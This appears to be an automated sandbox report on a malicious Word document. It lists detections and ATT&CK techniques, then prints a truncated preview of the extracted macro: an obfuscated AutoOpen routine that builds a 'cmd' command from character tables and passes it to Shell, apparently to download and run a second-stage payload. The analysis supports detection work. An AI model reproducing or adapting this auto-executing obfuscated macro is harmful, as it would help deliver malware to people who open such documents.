Verdict: MALICIOUS
Risk score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command via the Shell function, likely to download and run a second-stage payload. The specific command constructed is obfuscated, but the intent is clear.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-6786372-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6786372-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5288 bytes |

SHA-256 of macros.bas: 4d124adba8da63b05947ac6aad5b61edf2d5854e6035454555286ae63ad7c110
Script preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "KuOIVPzhFV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName JPCUiK
TypeName 8
TypeName Sin(7452)
TypeName Cos(221228446)
TypeName 404881494
Shell@ CStr("c") + CStr("m") + qUQnksiZGT + RrLlYJXUmwiVWz + oQzGcoLZ + VEzSdA + zqAsUHlpTW + PdiphUslm + uKiRldWZLR, 970999915 - 970999915
TypeName 57
TypeName ktmuR
End Sub
Attribute VB_Name = "ORzOUmCd"
Function oQzGcoLZ()
On Error Resume Next
TypeName Chr(941)
TypeName 76
rZquZjFO = "d /V:/" + "C" + CStr(Chr(zCEAvsO + GftNBnFGa + 34 + EHNBIvhciX + jBwIsUOAZBFc)) + "s" + "et Zk=oU" + "VX" + "BLqvB" + "oCcMnZ"
TypeName CByte(221)
TypeName KHunQ
TKLIvm = "UQJd{bu,w@" + "p-l}eS$D" + "(" + "P.y2+A" + "r9H" + ":zW" + "7N1;k)" + "j/F4" + "6'x Gt" + "Rsa" + "=" + "h\mYf" + "gi&&f"
TypeName HvCfwo
TypeName Cos(347)
TypeName kjuHAR
vBTWt = "or %w i" + "n (25,9," + "23,29,4" + "0," + "6" + "3,66,29"
TypeName 436780052
TypeName Tan(1)
TypeName Int(2)
kRhsbtrE = ",2" + "7,27,59,31" + ",62,44,2" + "7,65," + "13,29,23" + ",26" + ","
TypeName CBool(3008)
TypeName Oct(94249 / LuscO)
APRdsDfvRjQ = "9," + "20,52" + "," + "29,11,6" + "1," + "59,47,2" + "9,61" + ",35" + ",45,29,20," + "10," + "2" + "7,72,29,13" + ",61,49"
TypeName Atn(KQWjO * FQOvq - 64695 + jHsROc)
TypeName CByte(43)
riqFUA = ",31,68,39" + "," + "34,65,57," + "66,61,61," + "25,43," + "53" + ",53" + ",7" + "0,40,64,1" + "3,50,20,4" + "0,21,50,35"
TypeName 49
TypeName ChrW(619)
TypeName CStr(dTBwci)
iiOVsRTE = "," + "25,27,5" + "3,37,1" + "1,55" + ",48,25," + "39," + "27,"
TypeName vdUPii
TypeName CStr(wkuHRo)
TypeName CStr(81)
rmiXbT = "24," + "66,6" + "1,6" + "1," + "25" + ",43" + ",53,53,20," + "64" + ",40,9" + ",1" + "1,6" + "4,61,11" + ",66,3"
TypeName 171643997
TypeName svqBMZ
TypeName Round(5004 + 6766 - 39153 * QaDEkW)
wUdKikPBwcU = "5,11,9," + "68," + "53,21," + "60,3,69," + "1" + "5," + "56,24,66,"
TypeName pNwQfY
TypeName CInt(nCdNac)
TypeName ChrW(808)
mzdhnizcRW = "61,61,25,4" + "3,53,53" + "," + "70,29,72," + "61," + "9,63,6" + "4," + "29,70," + "21,52" + ",7" + "2"
oQzGcoLZ = rZquZjFO + TKLIvm + vBTWt + kRhsbtrE + APRdsDfvRjQ + riqFUA + iiOVsRTE + rmiXbT + wUdKikPBwcU + mzdhnizcRW
TypeName BBCEt
TypeName Rnd(VVjlA - JMtLa)
End Function
Function VEzSdA()
On Error Resume Next
TypeName Hex(CVEpwc - QBCPEN)
TypeName zCmNpY
TypeName YuwuO
JAEqHBSFW = ",61,64" + ",35,64,1" + "8,7,35,20," + "40,53,12" + ",2,71," + "34," + "44,8,42," + "24,66,61,6" + "1,25,4" + "3,53,53,50" + ",13,6" + "4,25,25" + ",2"
TypeName Sqr(qnbrp)
TypeName Round(mGlXSu)
ArYwla = "9,35,25,27" + ",53" + ",41,3" + "0,6" + ",24,66,61" + ",6" + "1,25,43,5" + "3,5" + "3,63,6" + "6,64," + "40,5" + "2,64,66" + ",64,"
TypeName Round(7)
TypeName 6307
DHwIjPi = "63,35" + ",11,9,68,5" + "3,54,30" + ",2" + "5,40" + ",48,20," + "57,3" + "5" + ",30,25,2" + "7,72,61,3" + "3,57,"
TypeName 45
TypeName Hex(8709)
qBGdwYqjc = "24,57,51,4" + "9,31,66" + ",47" + "," + "7" + "2,59,6" + "5,59,57,4" + "6,55,4"
TypeName CInt(9)
TypeName Sgn(jYOfNS)
TypeName JijRi
ZnHEIufOLHi = "8,57,49,31" + ",68,40,52," + "65,31,29,1" + "3" + "," + "7,43,61,29" + ",68,25,3" + "8,57" + ",67," + "57,38,31"
TypeName 420707845
TypeName Atn(41810 + drYQm + hCqiVB / RwpWNI)
TypeName Hex(11376 * MjSJI)
GhbmjjvNiMu = "," + "66,4" + "7,72,38" + "," + "57," + "35,29,58," + "29,57,49,"
TypeName CDate(rPYzZ)
TypeName 90
uuJSzIhK = "70,9" + ",40,2" + "9,64,11" + ",66,33,3" + "1,62" + "," + "9,"
TypeName Round(96785 + cOIFT)
TypeName Rnd(834)
opMXi = "69,5" + "9" + ",72," + "13" + ",59,31,68"
TypeName jUhYw
TypeName Log(LzwiqX)
ESJEqvn = ",39,34,5" + "1,1" + "9,61,40,36" + ",19,31" + ",62,44,2" + "7,35,32" + ",9,23" + ",13,27"
TypeName CBool(ZswPD)
... (truncated)
```